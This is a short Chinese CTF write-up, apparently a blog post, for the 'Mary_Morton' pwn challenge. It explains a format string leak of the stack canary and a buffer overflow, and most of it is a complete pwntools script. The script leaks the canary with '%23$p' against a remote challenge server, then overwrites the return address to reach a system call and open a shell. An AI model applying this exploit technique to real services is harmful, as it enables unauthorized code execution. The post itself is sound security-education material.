Mary_Morton

之前有讲到canary的原理,这道题就用到了。

checksec

在这里插入图片描述

ida

在这里插入图片描述
可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。

代码

from pwn import*
s=remote('220.249.52.133',48752)
sys=0x4008de
s.recvuntil('battle')
s.sendline('2')
s.sendline('%23$p')
sleep(0.5)
s.recvuntil("0x")
canary = int(s.recv(16),16)
print(canary)
s.recvuntil('battle')
s.sendline('1')
payload='a'*136+p64(canary)+'a'*8+p64(sys)
s.sendline(payload)
s.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值